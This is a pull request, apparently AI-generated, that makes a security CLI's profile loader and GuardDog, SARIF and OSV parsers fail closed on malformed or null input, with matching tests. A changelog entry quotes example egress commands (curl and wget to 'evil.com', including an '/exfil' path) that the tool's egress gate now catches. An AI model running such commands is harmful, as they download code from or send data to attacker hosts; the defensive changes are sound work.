### PR TITLE
fix(security): malformed input yields a verdict, never a crash — fail-closed parsers

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -36,6 +36,19 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/).
 
 ### Security
 
+- **Malformed input now yields a verdict, never an uncaught crash (fail-closed parsers).** The
+  bug sweep found the historical "malformed file → uncaught throw → empty stdout" class had
+  reappeared in several spots, all now fixed:
+  - a malformed/schema-invalid `.kit-profile.toml` crashed every `kit profile` subcommand
+    (`show`/`check`/`sign`/`verify`/`freeze`) with an uncaught `InvalidProfileError` and empty
+    `--json` stdout — a denial-of-verdict for CI. The top-level handler now catches
+    `KIT_INVALID_PROFILE` exactly like `KIT_INVALID_CONFIG`: a clean `{ok:false,error}` JSON +
+    exit 1.
+  - `classifyGuardDog` and the SARIF/OSV ingesters (`parseSarif`/`parseOsv`) dereferenced a
+    `JSON.parse` result without a non-object guard, so a literal `null` (valid JSON) threw a
+    `TypeError` — for GuardDog, crashing the whole `kit check --category security` run. They now
+    treat a null/non-object result as "unverified"/`[]` per their documented fail-closed contract.
+
 - **egress-gate now enforces scheme-less `curl`/`wget` targets.** Network-target extraction
   parsed only explicit `http(s)://` URLs, so `curl evil.com`, `wget evil.com/x`, and
   `curl -sL evil.com/exfil` — the most common egress forms — produced zero hosts and the signed

--- a/src/adapters/ingest.test.ts
+++ b/src/adapters/ingest.test.ts
@@ -132,3 +132,12 @@ describe("ingestStrict", () => {
     assert.equal(ingestStrict("osv", JSON.stringify({ runs: [] })).ok, false);
   });
 });
+
+describe("parseSarif / parseOsv — non-object JSON honors the 'malformed → []' contract", () => {
+  it("returns [] for null / number / string (never throws on log.runs / log.results)", () => {
+    for (const bad of ["null", "42", '"a string"']) {
+      assert.deepEqual(parseSarif(bad), [], `parseSarif(${bad})`);
+      assert.deepEqual(parseOsv(bad), [], `parseOsv(${bad})`);
+    }
+  });
+});

--- a/src/adapters/ingest.ts
+++ b/src/adapters/ingest.ts
@@ -79,7 +79,11 @@ interface SarifLog {
 export function parseSarif(json: string): SecurityCheckResult[] {
   let log: SarifLog;
   try {
-    log = JSON.parse(json) as SarifLog;
+    const parsed: unknown = JSON.parse(json);
+    // JSON.parse("null")/"42" is valid JSON but not an object; `log.runs` would then throw a
+    // TypeError, breaking the documented "malformed input → []" contract. Guard it.
+    if (parsed === null || typeof parsed !== "object") return [];
+    log = parsed as SarifLog;
   } catch {
     return [];
   }
@@ -156,7 +160,9 @@ function osvSeverity(v: OsvVuln): Severity {
 export function parseOsv(json: string): SecurityCheckResult[] {
   let log: OsvLog;
   try {
-    log = JSON.parse(json) as OsvLog;
+    const parsed: unknown = JSON.parse(json);
+    if (parsed === null || typeof parsed !== "object") return []; // non-object → [] (contract)
+    log = parsed as OsvLog;
   } catch {
     return [];
   }

--- a/src/cli.test.ts
+++ b/src/cli.test.ts
@@ -723,3 +723,45 @@ describe("kit self-audit (clean tree, machine output)", () => {
     );
   });
 });
+
+// ---------------------------------------------------------------------------
+// Malformed .kit-profile.toml must fail CLOSED (denial-of-verdict guard)
+// ---------------------------------------------------------------------------
+
+describe("kit profile — malformed .kit-profile.toml fails closed", () => {
+  let dir: string;
+
+  beforeEach(async () => {
+    dir = await mkdtemp(join(tmpdir(), "kit-profile-crash-"));
+    await writeFile(join(dir, ".kit.toml"), FIXTURE_EMPTY, "utf-8");
+  });
+
+  afterEach(async () => {
+    await rm(dir, { recursive: true, force: true });
+  });
+
+  it("exits 1 with valid JSON (never an empty-stdout crash) on invalid profile TOML", async () => {
+    await writeFile(join(dir, ".kit-profile.toml"), "version = = 1\n", "utf-8");
+    const result = await runCli(["profile", "check", "--gate", "--json"], dir);
+    assert.equal(result.exitCode, 1);
+    // The fix: KIT_INVALID_PROFILE is caught like KIT_INVALID_CONFIG — a clean JSON verdict,
+    // not an uncaught stack trace with empty stdout.
+    assert.ok(
+      result.stdout.trim().length > 0,
+      `stdout must not be empty; stderr: ${result.stderr}`,
+    );
+    const out = JSON.parse(result.stdout);
+    assert.equal(out.ok, false);
+  });
+
+  it("does not crash `profile show --json` on a schema-invalid profile", async () => {
+    await writeFile(join(dir, ".kit-profile.toml"), "version = 999999\n", "utf-8");
+    const result = await runCli(["profile", "show", "--json"], dir);
+    assert.equal(result.exitCode, 1);
+    assert.ok(
+      result.stdout.trim().length > 0,
+      `stdout must not be empty; stderr: ${result.stderr}`,
+    );
+    assert.equal(JSON.parse(result.stdout).ok, false);
+  });
+});

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -387,10 +387,11 @@ async function main(): Promise<void> {
         `${c.dim}Create a .kit.toml to define your project's tools, services, and secrets.${c.reset}`,
       );
       process.exitCode = 1;
-    } else if (code === "KIT_INVALID_CONFIG") {
-      // A malformed .kit.toml (bad TOML syntax or failed schema validation) must fail
-      // CLOSED like a missing one — a clean error + exit 1, never an uncaught stack
-      // trace with empty --json stdout (a denial-of-verdict any dropped file could cause).
+    } else if (code === "KIT_INVALID_CONFIG" || code === "KIT_INVALID_PROFILE") {
+      // A malformed .kit.toml OR .kit-profile.toml (bad TOML / failed schema validation) must
+      // fail CLOSED like a missing one — a clean error + exit 1, never an uncaught stack trace
+      // with empty --json stdout (a denial-of-verdict any dropped/edited file could cause). The
+      // profile commands (show/check/freeze/sign/verify) all propagate InvalidProfileError here.
       const msg = err instanceof Error ? err.message : String(err);
       if (jsonMode) console.log(JSON.stringify({ ok: false, error: msg }));
       console.error(`${c.red}${msg}${c.reset}`);

--- a/src/guarddog.test.ts
+++ b/src/guarddog.test.ts
@@ -52,3 +52,18 @@ describe("classifyGuardDog", () => {
     assert.equal(classifyGuardDog("[]").status, "warn");
   });
 });
+
+describe("classifyGuardDog — malformed JSON entries never crash the security run", () => {
+  it("treats a bare null / [null] as UNVERIFIED (not an uncaught TypeError, not a false pass)", () => {
+    for (const stdout of ["null", "[null]"]) {
+      const r = classifyGuardDog(stdout);
+      assert.equal(r.status, "warn", `${stdout} → warn`);
+      assert.match(r.detail, /UNVERIFIED/);
+    }
+  });
+
+  it("drops a null element but still classifies the real entries", () => {
+    const r = classifyGuardDog(`[${JSON.stringify({ issues: 0, errors: {} })},null]`);
+    assert.equal(r.status, "pass"); // the one real, clean entry — null dropped, no throw
+  });
+});

--- a/src/guarddog.ts
+++ b/src/guarddog.ts
@@ -34,8 +34,14 @@ export function classifyGuardDog(stdout: string): SecurityCheckResult {
 
   let entries: GuardDogResult[];
   try {
-    const j = JSON.parse(stdout);
-    entries = Array.isArray(j) ? j : [j];
+    const j: unknown = JSON.parse(stdout);
+    // Filter non-object entries: JSON.parse("null")/"[null]"/"[{},null]" is valid JSON, so the
+    // catch never fires — but a null entry would throw a TypeError in the loop below (outside the
+    // try), crashing the whole security run. Dropping them makes `null`/`[null]` fall through to
+    // the length-0 UNVERIFIED verdict instead of a false pass.
+    entries = (Array.isArray(j) ? j : [j]).filter(
+      (x): x is GuardDogResult => x !== null && typeof x === "object",
+    );
   } catch {
     return {
       ...base,


### PR DESCRIPTION
## What

Class A from the internal bug sweep: the historical **"malformed file → uncaught throw → empty stdout"** denial-of-verdict class (the one fuzzing caught in the baseline/config loaders) had reappeared in several spots. All fixed so malformed input produces a **verdict**, never a crash.

- **`cli.ts` — `.kit-profile.toml`.** A malformed or schema-invalid profile crashed **every** `kit profile` subcommand (`show`/`check`/`sign`/`verify`/`freeze`) with an uncaught `InvalidProfileError` and **empty `--json` stdout** — a denial-of-verdict for any CI gate consumer. The top-level handler now catches `KIT_INVALID_PROFILE` exactly like the sibling `KIT_INVALID_CONFIG`: a clean `{ok:false,error}` JSON + exit 1. (All profile commands propagate the error to `main()`, so one handler covers them.)

- **`guarddog.ts` — `classifyGuardDog`.** The classifier parsed stdout in a `try`/`catch` but iterated the entries **outside** it. `JSON.parse("null")` / `"[null]"` is valid JSON, so the catch never fired and a `null` element threw a `TypeError` in the loop — crashing the **entire `kit check --category security` run** with no verdict. Non-object entries are now filtered at parse time, so `null` / `[null]` falls through to the existing length-0 **UNVERIFIED** verdict (not a false pass, not a throw).

- **`adapters/ingest.ts` — `parseSarif` / `parseOsv`.** Both dereferenced `log.runs` / `log.results` outside the parse `try`; `JSON.parse("null")` → `null` → `TypeError`, breaking their documented *"malformed input → `[]`"* contract (reachable via `kit ingest sarif|osv` and the SkillSpector SARIF normalizer). Both now guard the parsed value.

## Tests

- `src/cli.test.ts` (subprocess) — malformed `.kit-profile.toml` → **exit 1 + valid JSON**, stdout not empty; schema-invalid profile likewise.
- `src/guarddog.test.ts` — `null` / `[null]` → UNVERIFIED warn (no throw, no false pass); a `null` element among real ones is dropped.
- `src/adapters/ingest.test.ts` — `null` / number / string → `[]` for both parsers.
- Full suite green (**3004 pass / 0 fail**).

Remaining sweep items: **PR-fix-3** (F — `"manual"` rotation crash, false-green GHA audit, `--since-days` NaN, staged-scan bypass) and **PR-fix-4** (E — ReDoS in plugin regex).

🤖 Generated with [Claude Code](https://claude.com/claude-code)